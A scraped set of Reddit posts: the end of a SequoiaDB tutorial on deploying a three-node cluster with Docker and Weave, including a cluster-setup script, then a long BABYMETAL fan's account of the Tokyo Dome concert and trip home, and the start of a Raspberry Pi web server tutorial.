The location of the mounted volume can be customized, but in general, it needs to create two types of mounted volumes, one for storing aggregate data, such as data/disk1, data/disk2, data/disk3, and so on. The other is used to store node configuration information, such as conf/local in this example. Thus, even if the container is deleted by mistake, you can still start a new container to play the role of the container that was accidentally deleted.

STEP5: Start the container
sdb1: weave stop weave launch eval $(weave env) docker run -dit --name sdbserver1 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb sdb2: weave stop weave launch eval $(weave env) docker run -dit --name sdbserver2 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb sdb3: weave stop weave launch eval $(weave env) docker run -dit --name sdbserver3 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb is the IP address of sdb1 and 11810 is the externally exposed cluster access port. The volume on the host that stores the node configuration information must be hung in the /opt/sequoiadb/conf/local directory of the container. The volume that holds the table data can be mounted to the user-defined directory. However, once the cluster is created, it cannot be changed. The machine name must be specified when starting the container, because after the cluster is built, the machine name will be saved in the system table of SequoiaDB. If the machine name of the node is inconsistent with the system table, it will not be added to the cluster. In the scenario of using weave, it is recommended to use the--name option. Do not use--hostname to set the machine name. The latter will prevent weave from adding the machine name to the DNS server. Weave will automatically set the machine name according to the value of --name, and add the weave.local domain name after the machine name. Also, it will add it to the DNS server.

STEP6: Copy the script that created the SequoiaDB cluster to the container docker cp create_cluster.js sdbserver1:/data
The content of create_cluster.js is as follows:
var array_hosts = ["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]; var array_dbroot = ["/data/disk1/sequoiadb/database","/data/disk2/sequoiadb/database","/data/disk3/sequoiadb/database"]; var port_sdbcm = "11790"; var port_temp_coord = "18888"; var cataloggroup = {gname:"SYSCatalogGroup", gport:"11820", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]}; var array_coordgroups = [ {gname:"SYSCoord", gport:"11810", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]} ]; var array_datagroups = [ {gname:"dg1", gport:"11830", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}} ,{gname:"dg2", gport:"11840", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}} ,{gname:"dg3", gport:"11850", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}} ]; var array_domains = [ {dname:"allgroups", dgroups:["dg1", "dg2", "dg3"], doptions:{AutoSplit:true}} ]; println("启动临时协调节点"); var oma = new Oma(array_coordgroups[0].ghosts[0], port_sdbcm); oma.createCoord(port_temp_coord, array_dbroot[0]+"/coord/"+port_temp_coord); oma.startNode(port_temp_coord); println("创建编目节点组:"+cataloggroup.ghosts[0]+" "+cataloggroup.gport+" "+array_dbroot[0]+"/cata/"+cataloggroup.gport); var db = new Sdb(array_coordgroups[0].ghosts[0], port_temp_coord); db.createCataRG(cataloggroup.ghosts[0], cataloggroup.gport, array_dbroot[0]+"/cata/"+cataloggroup.gport); var cataRG = db.getRG("SYSCatalogGroup"); for (var i in cataloggroup.ghosts) { if (i==0) {continue;} println("创建编目节点: "+cataloggroup.ghosts[i]+" "+cataloggroup.gport+" "+array_dbroot[0]+"/cata/"+cataloggroup.gport); var catanode = cataRG.createNode(cataloggroup.ghosts[i], cataloggroup.gport, array_dbroot[0]+"/cata/"+cataloggroup.gport); catanode.start(); } println("创建协调节点组"); var db = new Sdb(array_coordgroups[0].ghosts[0], port_temp_coord); var coordRG = db.createCoordRG(); for (var i in array_coordgroups) { for (var j in array_coordgroups[i].ghosts) { println("创建协调节点组:"+array_coordgroups[i].ghosts[j]+" "+array_coordgroups[i].gport+" "+array_dbroot[0]+"/coord/"+array_coordgroups[i].gport); coordRG.createNode(array_coordgroups[i].ghosts[j], array_coordgroups[i].gport, array_dbroot[0]+"/coord/"+array_coordgroups[i].gport); } } coordRG.start(); println("删除临时协调节点") var oma = new Oma(array_coordgroups[0].ghosts[0], port_sdbcm); oma.removeCoord(port_temp_coord); println("创建数据节点组") var db = new Sdb(array_coordgroups[0].ghosts[0], array_coordgroups[0].gport); var k=0; for (var i in array_datagroups) { var dataRG = db.createRG(array_datagroups[i].gname); for (var j in array_datagroups[i].ghosts) { println("创建数据节点:"+array_datagroups[i].gname+" "+array_datagroups[i].ghosts[j]+" "+array_datagroups[i].gport+" "+array_dbroot[k]+"/data/"+array_datagroups[i].gport+" "+array_datagroups[i].goptions) dataRG.createNode(array_datagroups[i].ghosts[j], array_datagroups[i].gport, array_dbroot[k]+"/data/"+array_datagroups[i].gport, array_datagroups[i].goptions); } dataRG.start(); k++; } println("创建域"); var db = new Sdb(array_coordgroups[0].ghosts[0], array_coordgroups[0].gport); for (var i in array_domains) { println("创建域:"+array_domains[i].dname+" "+array_domains[i].dgroups+" "+array_domains[i].doptions) db.createDomain(array_domains[i].dname, array_domains[i].dgroups, array_domains[i].doptions ); } 
docker exec sdbserver1 su - sdbadmin -c "sdb -f /data/create_cluster.js"



SequoiaDB uses container technology to achieve rapid cluster deployment, which greatly simplifies the installation and deployment of beginners. Later, the author will also do some optimization on SequoiaDB image production, because the image currently made is a bit large. The main reason is that using the ADD or COPY command to copy the CD-ROM toward the Docker container will generate a new image1, although the finally generated image2 has been deleted CD-ROM, it is above image1, and the size of image2 still contains the CD-ROM. Thus, it is best to use ADD command to copy tar package(ADD automatically decompress ) or use a method as follows:
RUN mkdir -p /ussrc/things \ && curl -SL http://example.com/big.tar.xz \ tar -xJC /ussrc/things \ && make -C /ussrc/things all 
submitted by sequoiadb to u/sequoiadb [link] [comments]

2017.02.28 16:29 Facu474 The most distant Kitsune - Tokyo Dome Trip - Part 6 - The Metal Resistance Continues

WALL OF DEATH… ehh I mean Text
Hello again! This is a continuation of my story Here you can find Part 1 (the rest in the comments). This part is all about TOKYO DOME - Black Night and the end of my trip.
I am sorry, but this part is by far the longest (I stopped because I reached Reddit's 40000 character limit), but I figured not to put another part with my conclusions alone. Also, I think I should publish this, lol, 28.000 words, 45 pages, and counting.
I am sorry for the long wait. We’ve had the absolute worst heat wave. 42C every single day for the past week, and a terrible storm on Tuesday did nothing to help. It actually made things worse, this was my highway (yes, highway) offramp, here is a video. Some poor people decided to take the surface road, needless to say, it didn’t end well. All of this has lead to long blackouts. So I couldn’t do anything. Thankfully, the weekend arrived and power is now stable (still hot though), Monday and Tuesday are holidays, os it gives me extra time for this. We also got an eclipse on Sunday! But please, now, enjoy…
Tuesday - 20th (Black Night): I woke up to see that there were several videos from last night, I wanted to watch them all, and the the dresses from the night before (I hadn’t even seen them, I only saw ants move across a stage), but I had to leave early to go to see a family member of mine. He lives near Shibuya. He’s been living in Japan for over 50 years, and I hadn’t seen him since I was a kid. So I went (very difficult to find the platform for his train line in Shibuya Station, its at the very end). I got off and it was a pretty small Station, a lot of people my age, though, because there was a university nearby. I loved that I came to see him because I was able to walk through some very Anime-like neighborhoods, crossing the train tracks, and everything. I found the house (at the very end of his complex). I brought him some food from Argentina, and we spoke for awhile, it was a nice experience.
After leaving, I went back to Akihabara, where some redditors (shackonthetarget, zarcka_metal, bogdogger, and... I don’t know the username of you other, sorry, if you see this please tell me) were in a Maid Cafe, I decided to join them. When trying to find the building, I saw a maid outside giving out fliers, I asked her (she spoke better English than my hotel staff, lol) she directed me into the building behind her. It was floors and floors of games, and I just could, t find where I had to go. Turns out, you had to get on the elevator on the first floor :/ I finally got there, and saw them. I really can’t speak perfectly about this, it was a really weird experience, especially since I haven’t seen any Anime. I knew none of the phrases they were saying, but… its something I think everyone should do in Japan. The food was adorable, and so were the maids. We were able to keep the bunny/cat ears. Can’t say I have put them to any use. lol. The coolest part was that they were playing BABYMETAL over the speakers for us (we didn’t even ask), and one of them went on stage and sang Headbanger!!! She knew all the moves! That was seriously a really cool part of the trip, Thanks to shackonthetarget for the idea!
After eating, we then headed just half a block over to… Trio :) Well, in reality, we kinda did more in the rest of the building (Akihabara Radio Kaikan). Mostly in the rest of the Anime shops. Shackonthetarget was very excited at all the things sold. Now that I have seen some Anime, I understand, and know some characters. But at the time, I didn’t really know any. But it was still super funny the NSFW positions some Anime girls were put in, like, not even subtle.
Tokyo Dome
After that, we headed to Tokyo Dome. It didn’t stop raining (thanks typhoon). I went with some to a 7/11 (like I didn’t know enough of them already), because they had to take out cash (The Maid Cafe was not cheap). Everyone went to their hotels, and I waited there for like half an hour. I saw a billboard in the middle of the “mall” in Tokyo Dome City, it was Himeka!!! I am sad to say I can’t find the picture I KNOW I took… Oh well… I waited until shackonthetarget and zarcka_metal came back, and we went to an English pub there (called The HUB). They had this on the wall, which I couldn’t stop laughing about (technically, Celtic does use it from time to time, but that chant is associated way more with Liverpool, lol). They were playing BABYMETAL too, and with reason, since it was full of kitsunes. We spent like and hour or two talking, and drinking. An hour before the show was going to start we headed to the Dome. I was laughing because of the amount of people who had an extra ticket for the show,. They were trying to give them away for free (they were all gate 41, my section, lol), if only I had known. Some were exchanging them in the Tokyo dome Hotel lobby. One person in the group (was it BigBobby2016?) couldn’t find the hotel. We were laughing our asses off because this is what you see from the Tokyo Dome, there are no towers even close to the height in the area, and the name is on the top, lol.
We separated at this point, I stood at the entrance for a few minutes, maybe I could see a famous BM fan, or the ones I knew. I did get to meet the girls from the video circulating at the time (no picture, I didn’t want to put them, or their parents in a tight spot, they are young after all. I did catch them in a video I took, though (only briefly).
No line this time, since we entered much after the gates opened. This seat was much better than yesterdays, I would say one of the best seats, I had the middle (front) of the stage directly in front of me. I was high up, but this meant I had a great view of the entire stadium, especially considering I was just before the veranda, and next to the aisle. And as I waited for the show to start, I saw a familiar face, gardiguy, he got one of the free tickets, and was a few seats behind me, so I went over to him and talked a bit. He was actually supposed to be at the Sumo championship, he said he had fun, but that he got bored (the presentations take ages for a 5 second fight). I had told him he would prefer BM over that. Then, maron-metal ’s wife appeared, Eriko. She had the other seat next to gardiguy, we talked a little more, but I left as the “owners” of the seat came, not before taking a picture! Sorry Eriko, got you with your eyes closed :/ We were also sending pictures of our views (on the Line group), and look at the terrible seat sho-taBlue got, poor guy.
As you can see in the picture, I wore the Argentina jersey. I had actually wanted to take the flag I had, but I didn’t want to get into any trouble, or bother any one around me. This was a great compromise. Plus, I knew I would be easily spotted. And, I was, I can see myself in the ProShot!!!

Black Night

So, I sat in my spot, put on my corset, and had the Onedari Dollars, and Awadama Balloons in my pocket; since they weren’t played the day before, I knew they would be played today. So… the lights started dimming down again… Ohh the excitement filled the air…
Show Start: Koba appeared again… I can’t remember, but I’m sure at least 99% of what was said was the same as Red Night. Then, another video started… with the BABYMETAL DEATH Intro. Fuck Yes!!! The best song to start a show with!!! Every time I hear it, I get goosebumps. The video started explaining how the whole world joined here this night, I felt so good being a part of this. The woman in the video asked if we were ready to headbang? “Yeah!!!” Then again: “the Fox God can’t here you. Are you ready to Headbang?!” “YEEEAHHHH!!!!” Everyone screamed!
Song 1: I can’t explain how loud I shouted every single letter: “B” “A” “B” “Y” then, the “M” that the Japanese pronounce more like an “L-O”, that ones kinda tricky. And so on… In my section, most people didn’t jump, but I wasn’t about to let that change me, I jumped like I was in THE ONE section, almost hitting the person next to me each time. Then came “Death” (desu) ”Death” “Death”… I love it with that long outro with the lights behind the girls.
Song 2: Awadama Fever, all I can say about this song is: “AHH… YEAH! Tondeke, ba ba baburu gamu!” (I don’t care its a Su part, I sang anyway!) Plus, I really enjoy the middle break, and the “1, 2, 3, 4 !” ..n “Hii fuu mii yoo!” I love this song because since most movements are with the arms, and not too complicated, Su can join in the choreography with Yui & Moa, more-so than usual. (I just noticed in the second video almost at the end the little dance Yui does… Love it!]
Song 3: Ohh yeah… I could hear a “motorcycle” (at least, thats what I think of when I hear it). One of my favorites is coming, and I think supremely underrated… Uki Uki Midnight!!! I love electro-pop, plus some added Metal in the background, you get a masterpiece. Again… I thought I was going to lose my voice completely… only 3 songs in, and they were some of my favorites… I knew the Ainote perfectly, and shouted every, single, one. “You and ME”! Plus that end segment is one of my favorite BM moments… (I hope they add a little more of the wide shot with the lights in the Delorean) This is turning in to an awesome show!
Song 4: We could hear drums… that means its META time. I gotta say, at this point I was thinking “great, a “slow” song” (one I particularly never got the feeling for). Ohhh, boy, was I wrong. I the only choreography was the slow walk back and forth, but these little “jiggles” by Yui and Moa… they caught me. And the deal was finally closed wth the “oooohhhh… oooohhh…. “ chant. (THAT I APPEAR IN!!!) That part was just too impressive, I did not expect anything like it. By FAR one of my favorite moments of the shows. I wasn’t too fond of Meta Taro, but when you heard all the stadium singing in unison, it gave a new meaning to song, I will never forget that.
Song 5: Sis Anger Another one I couldn’t really “get”, sadly… I still can’t get it. To me they removed from this song the reason I listen to BM… Kawaii + Metal, Pop + Metal. I am not saying I dislike the metal portion… I love it, but I don’t like how they changed the girls’ tone of voice. I do love the intro though… I’ll get it at some point… It did give us this gorgeous Yui silhouette…
Song 6: Another amazing intro… (I LOVE INTROS!!!!) They really hype the song more than if it were just played… I think context is as important as the main subject. It was Mischiefs of the Metal Gods. Boy… are their mischiefs good. The Kami band (to me) has become such an essential part of BM. I can’t imagine BM without them… Boh is just…. The best. His part with everyone clapping is just freaking amazing! It makes a guy shed a tear how he can play with both hands. But don’t think I don’t share any love for the rest. Ohmura always goes crazy, even when not in the spotlight. LEDA is methodical, he is always 100% concentrated on what he is doing, throwing a face every now and then.
Song 7: Obviously… after a Kami solo… comes Su solo. Another INTRO!!! This time its a slow piano + orchestra intro. It really is music to present the queen. Yui and Moa get some hijinks stories, a perfect fir. While the Queen gets proper Royal entry music. I am conflicted, but if someone asks me my favorite song, its either Akatsuki, or Kimi to Anime ga Mitai (I know, completely different). One wasn’t (and might never again be) played. So Akatsuki definitely was going to be my favorite. The thing with Su solos is the lack of participation. Black BM songs are essentially 50% crowd participation (4 no Uta is like 90%). But this seems like I say it is bad… NO! We are watching a spectacle. With MoiMoi, we have fun WITH them. With Su… I would see we watch her have an inner battle… could be anything, only she knows, but we do see her get better and better at it. Every time she gets on the stage she immediately steals the spotlight, and doesn’t waste it one bit.
Song 8: Onedari Daisakusen. My favorite Black BM song. I love this song, but with the lack of fancams and it not being in the WOWOW broadcast… I can’t seem to remember much. I can tell you my favorite part is the break in the middle with: “One for the money, two for the money…, money, money, money…” and then the “Katte! Katte! Katte! … Chodai! Chodai! Chodai!…”
Song 9: No Rain No Rainbow. Another song I had underestimated. Note, I loved this song. Its the only BM song my family can listen to, I have played the Budokan Live for the past year, can’t wait to be able to switch to the Tokyo Dome version; of they liked Budokan, they will love Tokyo Dome’s version. When I say I underestimated it, its because I didn’t believe it could be THAT much more impactful live, since its a slower, less loud, song. But I was entirely wrong, I would say its one of the songs that most improves in the live version. You can feel Suzuka put all her strength into the vocals of this song, killing every note. The same goes for the Kami, they seem to be involved emotionally into the song as well, the guitar duets really shine in this one. Since it wasn’t released in WOWOW, I did a little “Remaster”; adding the Intro, and using the best video I found, with the bootleg audio. I am truly sorry for those that were saluted by the Queen at the start of the song, we know that is impossible to survive, RIP.
Song 10: Doki Doki Morning. The one that started it all some 6 and odd years ago. Amazing they can still play it with such spirit after all these years. You can (obviously) see a huge improvement. Moa now remembers when to start, lol The three girls reappeared, all on the upper stage! How are they gonna dance up there? Its so small! Somehow, they found the same to do so.This song was so fun, after a very emotional No Rain No Rainbow, it brought everyone back up!
Song 11: “Kitsuneeee…” Ohh shit…. Here comes the fan favorite (at least, under my understanding). By far… no other song is close… Megitsune. This song was even more powerful given we visited the shrine where they filmed the MV the night before. As soon as it started with just the first “SORE!” I immediately knew it was everyones favorite, far louder than anything else I had heard up to then, everyone was putting all their strength here. The best part: I didn’t expect a C&R at all… but we got one! Just after the slow part of the song: “Are you Ready? Are you ready TOKYO DOME!?!!” I don’t even know what Yui or Moa said, but I shouted with everyone anyway! “Soiya Soiya Soiya Soiya….” “SORE!” (X2!!!) I expect the doubled “sore” part even less… But I’m so glad we had it… it really helps.
Song 12: Gothic Music? You better bet its some Head Banger!… “but I had head banged too much, how can this song live up to its name now?” Ohh… if only I could have shut my mouth… I barely knew what was about to come. The first part… completely standard. Same callbacks as always (only louder because there was so much more people than always. Then… the longest headbanger in history. My arm hadn’t even been able to rest from the night before… I really thought my arm was going to literally fall off. I had to switch arms… I just couldn’t continue with both. I knew at this point how much THE ONE must train their heads and arms for this. I was doing some major amateur work. I also noticed the Kami was into it too… the 3 (Ohmura, LEDA, and Boh) were on the floor (must be really hard to play). Again, no idea what Yui or Moa were saying… lol. Even Su got some talk in! Sadly (or thankfully, at least) a guy who was on the floor bowing down over and over was shown only a second on the WOWOW broadcast. But I remember clearly from the show, he was shown on the big screen for a VERY long time, must have been well over 30 seconds. There was also smoke, but I was surprised MoiMoi didn’t get an upgrade and get some cannons by this point… (Note for Koba next time ;).
Song 13: The “oh so famous”piano Intro (with Sus voiceover) started. First I thought it was odd it was in English, though the whole show was like that. But more importantly, I clearly saw they changed what was usually said to include the lighting of the corsets. (Talking about “linking our hearts together”) Actually, the whole thing was mostly changed. At this moment the corsets lit up (with RED this time!!). Sadly, I have to say my corset didn’t work this time :( Its difficult to see with it on, so I took it off for a second, and saw the light was NOT working… Oh well, nothing I can do now. Then, Su appeared, and Yui and Moa on the end of the coffin platforms! At this moment I looked at the crowd, to see if thy would maybe move the chairs to the side and MOSH! Nope. Yui and Moa started their run, and the whole stage was “set on fire”. Actually, small fires remained through the whole song.
Encore: A sad part, to see the end of the shows. But the crowd was as wild as ever, and the Kami and the girls were really loose now. I clearly remember (and am helped by the pro-shot) Su’s face after the first set of “We are BM!” First she. Had the biggest grin on her face, and she immediately turned into a “your damn right we are” face. You could see her through the entire thing, she was ecstatic. I talk more about Su, because even during the songs (especially Black BM) you get to see Yui and Moa act more. But thats not to say they (and even the Kami) weren’t letting all the energy left out! I was in awe looking at the entire stadium, everyone shouting in unison “We Are BM!!!” Ever since I first saw the Budokan Blurays this had been a dream, to be in Japan shouting the famous phrase. I was so into it, that I missed the, now incredibly famous moment; Su’s slip. I did see her on the floor, though, since the whole stadium shouted: “Oooohh” as soon as it happened. Then Yui almost slipped as well! MoiMoi grabbed each other, and trying not to slip themselves. They got to the end, hugging each other. This is, by far, the most memorable moment of the trip. And then Su giving Yui and Moa a moment with the Mic. They seemed thrilled she would offer it. And add some confusion with Moa. They then went to the center stage, did a “We are BM!” Again, and disappeared! But we were not alone, for the Kami came out, poor LEDA slipping in the same spot as Su.
Just so you know why things might get a bit moody from here on out, while I wrote this, I was listening to X Japan’s Tears, Say Anything and Art of Life, a deadly combination.
X Japan has a HUGE role in BM existence; if you can, please go see them at Wembley on March 4th.
When it ended, this time I wasn’t as… pensive, as last time. I didn’t have ANY type of BM blues, like the day before, because this time, I had something to do. With the meet up group, we were set to meet outside the stadium. Before leaving my seat, I (having nothing to “lose” now), I took 3 pictures (I don’t know why I didn’t just take an F***ing Panorama). So, I started While trying to get outside, the pressure from inside and the wind pushed you out, lol. As I got down to the bottom of the stairs, some guys saw my t-shirt and shouted: “Vamos Argentina!!!” I was laughing so much, and answered with a fist in the air:”Asi me gusta! Vamos Japon, tambien!” Everyone around us had a horror look on their face, like I was shouting like some demented preacher. Too bad I didn’t stop and take a picture, I wanted to make sure I didn’t miss my group. I got to the entrance, and waited 2 minutes before aunthor appeared. He told me he had seen me in the stadium, that he was just a couple (couple much) seats behind me. Too bad I didn’t know at the time. We were set to go to the HUB pub. We went there (just a few hundred meters away), still raining. The place was packed, with no sign of our group. They sent a message, they were looking around the Suidobashi station for somewhere to eat, so we headed there. The station was packed, again. While we waited I went over to a guy selling sets of printed pictures of some BM shows. Koba would have probably gone livid if he saw this (remember Mexico).
We got a message. They had found a restaurant, on the other side of the station from Tokyo Dome. They sent a picture of the front so we could spot it. We walked towards it, trying too find it, and we spotted Kentosdad, who had came outside to signal us, in case we missed it. Bless him, he was waiting in the heavy rain; he even stayed outside for others that were coming. We went upstairs, again, you had to remove your shoes before going inside. We entered and found our group, we took up an entire section (4 tables) of the restaurant. AS I was sitting down, I realized I hadn’t used any of nabazul s gifts :/ * Yelp . Ehhh…. Better not say anything. *:()** Everyone was trying to get everything they saw during the night out at the same time, it was impossible, but we finally could talk slowly about each part of the show. I remember xacto_knife talking about how everyone was off-sync in the Megitsune “wave”. I had noticed it too while we were doing it, everyone was moving off-beat. Everyone was shouting when they had their arm behind their head, when it should be in front of their head. At the time I thought it had to do with the time it took for the sound to move across the stadium, but if you see in the video, even the people some rows back were doing it wrong (while the front row was doing it right). We talked about why the baseball net was still up? It kinda blocked the view for some. When everyone had arrived we finally started ordering. Poor kentosdad had to order everything from this tablet on the table, there were so many orders! Looking around us, most of the tables (if not all) were BM fans. Some were getting quite drunk, from what one could hear (shouting) lol. A couple (a man and a woman) in a table next to us were curious. They asked some questions, where we were from, and whatnot. Some from our group gave them their fan creations. I think pepcok s chains, and DaemonSD s pins/keychains? After this they wanted a picture with all of us, we obviously obliged. I can’t remember why, but we took another picture without the guy, but with the girl. Not that I’m complaining. I can’t even remember what we ate that night, had so many thoughts crossing through my mind.
We stayed there talking about the shows until like 12, when some of us had to leave (because trains stop at like 1 AM, don’t want to be left stranded). We all said our goodbyes, and those who didn’t stay in this area headed to the station. I went on the train with Kentosdad, and someone else (who was it?). This other person got off at the first station. And I continued with Kentosdad to Akihabara (2nd station). Knowing this was the end of my journey, I thanked him, and we waved goodbye. I got to the hotel around 1:30AM. I got a picture of an almost deserted Akihabara Station. I kinda stayed there for a minute watching, knowing this was my last night. When the trains stopped passing, I decided it was time, and went to bed.
Wednesday (9/21) I woke up to see this. Busted… lol (look who is in the background). Lets just say… someone * cough * kentosdad * cough * had called in sick for Tuesday… Needless to say, I don’t think BM fever is an acceptable condition to leave work. I knew I would return home in the afternoon, so I packed my things, checked out, and left my bag in the lobby. Before I left, I had to do one last stop in Trio. I went over, and I happened to meet two foreigners there. It just so happened they were suzukayuimoa and fukei-metal. The funny thing is, we didn’t know each other were redditors! We only found out when I recognized suzukayuimoa in his post, and fukei-metal happned to appear in the comments! What a small BM world. I ended up buying the Land of the Rising Sun T-shirt. I really liked it, ever since I saw the Japan map in the back. But I was really still searching for the Doodle sweatshirt, I didn’t find it anywhere :( ( However, I just bought it last week on Buyee :).) We went together a little, around Akihabara, entering a few shops with some BM things. I forgot to take pictures this time :/ We ended up separating when we entered a shop, I decided to stay for a while longer to buy friends any family gifts. As soon as I got everything I wanted, I left back to my hotel. But, I just couldn’t, I had something in the back of my mind controlling me, saying: “You must buy something else.” Sigh… I went back to Trio… Thankfully, I had the mindset to buy something cheap, so I ended up getting this Yui SG “signed” postcard. Ironically its something I am very grateful to have purchased, I love the little postcard.
At this point, I didn’t have time for any more detours. I went back to my hotel, and got my bag from the lobby. Before leaving I noticed that the Halloween decorations were already up (over a month before October 31st), quite off for me for it to be so early. I took the train from Akihabara (Yamanote Loop), to Tokyo Station. There I went down to the Narita Express (its direct to the terminals, and its made to take bags, unlike regular trains). As it went by the buildings, I got my last sight of a landmark, the gigantic Tokyo Skytree. I watched as it went by, it seemed to never want to go away…
I forgot to mention that, the 19th, I had sent one of my bags to the airport (full of new clothes and gifts). First thing I did at the airport was go and get it. They are really fast, and cheap, what an amazing service. I found the JAL check-in area, and as soon as the staff member started checking me in, he was like: “Argentina?! You have a long way to go, I do not envy you” Lol.
Before going through passport control, I explored the shops a bit. I went into the Pokemon shop, and played a bit with this… odd game. I then tried to find a place to eat. I found this restaurant with a beautiful view over the airplanes. This cost less than $10 at the airport!!! How is this possible?!?! I went inside the Terminal, passing passport control, and passed a shop which had tons of people going nuts in it for some reason…??? I finally got to my gate, and saw this beautiful JAL 777, next to our plane (booked from our view). I was a little early, so I watched a bit of news, and even the Sumo wrestling gardiguy had seen the day before!
But, it was finally here, time to board. I can’t say I was amused getting on a 787 this time… I did carry something with me, though, the Wembley memorial T-shirt. By this point the shirt was completely sweaty, and I did bing a spare shirt, but I did not want to take it off, I wanted to keep it on, forever. Then, the moment had to come at some point, we took off. I watched, with tears in my eyes, as this magical place, where I had met incredible people, and had the time of my life, was being left behind me.
I was reanimated by watching some of my favorite shows to distract me, I just couldn’t listen to BM at this moment, it would not brighten up my day, and I never want BM to be associated with any negative thoughts. The amazing Japanese food from JAL lightened my mood up again, as a final Japanese farewell. Then, we crossed the International Date Line, I was once again back in my side of the world. Finally arriving in New York 14 hours after we took off. I did have a bright point here, I always love saying this: I left Tokyo at 6:30PM, and arrived in New York at 6PM, the SAME DAY. (mint-flavored time machine, maybe?)
This time, I was in no rush, I had plenty of time to get to my gate, and the excitement obviously isn’t there anymore. I did get this beautiful picture of the sunset I had seen twice, now. I was sadly reminded why I viewed Japan so highly. Since I had to change terminals, I had to do TSA again. I can not describe the disgusting attitude these specific “staff” members (more like bullies to me) had towards people. There were quite a few foreigners who didn’t speak English there (yeah, I know, how dare they? at an AIRPORT?!?!? Who do they think they are?) /s I had to translate to some Spanish speakers, since the staff made no attempt to help them. Too much on that, lets continue.
Since my sense of time was screwed (it was currently the evening, but for me it was the morning), I went over to a store and got a Strawberry milk (my favorite every time I go to the US), and a chocolate bar. I spoke to my dad, and he was telling me not to eat fats. I was like: “I have no idea what time it is, and barely recognize where I am, I’m gonna eat whatever I want, haha” (he understood I was mostly joking). I waited for my plane, and heard some commotion in the gate entrance, I wouldn’t have guessed in a million years who it was. I heard someone say “Macri, sos un capo!” This can’t be?!? (Macri is Argentina’s current president). Since I didn’t see him, and I was in coach, I didn’t know if it was truly him, or just some celebrity with security and someone got confused.
I hadn’t even realized, but as soon as the flight took off, I crashed, this had never happened to me before, much less on a flight. I ended up waking up very close to reaching Argentina. I was waken up by the breakfast service (I was thinking of dinner, lol). As soon as I got the food, I knew I had come back to reality hahahah Watching the map this time didn’t help, either. Getting ever closer to home. When we landed, and got to the gate. It ended up being true, the president WAS on the flight! A cool anecdote to end this incredible trip on.
When I arrived back home, first thing I did was go into YouTube and look at the Shibuya Crossing live broadcast I must have stared at the feed for a good hour before I realized I had stuff to do.
The BM blues are real people, and I had to add to that Japan blues. They both hit hard once I returned. I watched every single fancy I could to relive those memories. I kept watching all the pictures I had taken and remembered every beautiful moment. Thankfully, to soften the blow, I also stayed in contact with the amazing people I met at the meet ups, and they shared great pictures of the amazing time they were having in Japan. We actually continued speaking, remembering the important parts of the trip. I also got to keep the amazing “toys” Koba let us keep! And brought some snacks (I still have a lot, I just can’t get myself to eat them!).
Conclusions: The trip was something I needed, I needed that culture shock. No culture is perfect, and I know its 100% different living than just being there. A few days to have fun. But there are some things that don’t change: being able to walk through the streets with a phone in my hand, no matter the hour, or if the street didn’t have any lights, it didn’t matter. People acting “civilized” on public transportation (I will never forget the songs at train stations, I even downloaded them!), as if other people mattered. People treating you like a human being at shops and restaurants, trains/buses not arriving 40 minutes late, and then going slower than 40km/h. This was a different world altogether. I mean, I noticed this before I even came back. In the New York Airport (JFK), I went to a store, and the prices were absurd, remember what I ate in Narita for less than $10, well, here they were selling a 300ml coke bottle for $5 (I won’t even tell you what it costs in Argentina, because I already showed you in part 2). When a customer complained about this, the clerk told the customer, and I quote: “Fuck off, if you don’t like it, don’t buy.”. But, even better, the second landed, I am not kidding, the baggage handling union started a strike, the only reason I got my bag that day, was because I happened to be flying on the same plane as the president!
So, apart from giving me an amazing time and memories, it was really a life lesson. I had often questioned the “need” to break my ass off studying, and at work, I was kinda lost. But this trip really opened my eyes. If I ever want to actually improve my quality of life and reduce my stress with the most basic things, I have to work as hard as I can to get the hell out of here. It doesn’t need to be Japan, but I really can’t live here for another 20 years, I just… can’t. Sorry to lay that on you guys, I got into a little rant.
I was a bit sad that I didn’t go to the afterparty on Red Night, or that I didn’t meet anyone outside the stadium. But I still love all the people I met in the meet ups!
When I left for Japan, to me, this subreddit was a community, people who helped each other in their time of need, and always there, to discuss a (probably at times not healthy) love for a band. Not just any band. A unique kind of band. A band that moves people enough to change their entire lifestyles, to make any accommodations possible for the sake of even getting a mere glimpse of the members. However, when returning, I realized I was wrong. We are more than that, we are a big family, that traverses “generations, boundaries, time and space itself”. Its not just that. I take all of you as part of tightly nit family. You guys did everything possible for me to have an amazing time at Tokyo. Thanks to every single person who helped me!
Honestly, just being able to be with the community is a major part of why I want to go see a BABYMETAL show again. I don’t think any other band has this type of community. I am waiting for them to come down here so I can meet the local BM community. I have met some though Facebook and WhatsApp groups, but I hope to see them in person. I have started a Spanish subreddit (/BABYMETALespanol), though I have just started with the Wiki for now, and this is the first time I mentioned it publicly. I also want to see everybody again, and hopefully new kitsunes whenever my next trip is.
I think I speak in name of everyone when I say: I need the Blu-rays, right NOW!!!
Here is an album with all the pictures of this post.
Thank You for reading this post. And special thanks to all those who read the entire 6 posts. Lets hope my next trip is not that far away. But, until then; Put Your Kitsune Up! 🤘
submitted by Facu474 to BABYMETAL [link] [comments]

2017.02.13 22:08 4bidden1337 How to use raspberry pi as a regular web server and access it from anywhere[TUTORIAL]

HOW TO USE RASPBERRY PI AS A WEB SERVER as requested by The-Hidden-One
Hey guys, I am writing this tutorial to help some users who shot me a PM asking on how to run a web server on the pi. I would like to excuse my English as I am quite young and not from any English-speaking country, so there might be some grammar mistakes in this post. However, I will try to write as good as I can so you have the best experience possible. Take in mind that I am no expert in linux/raspberries neither and I am sharing what I have learnt in few weeks of owning a pi.
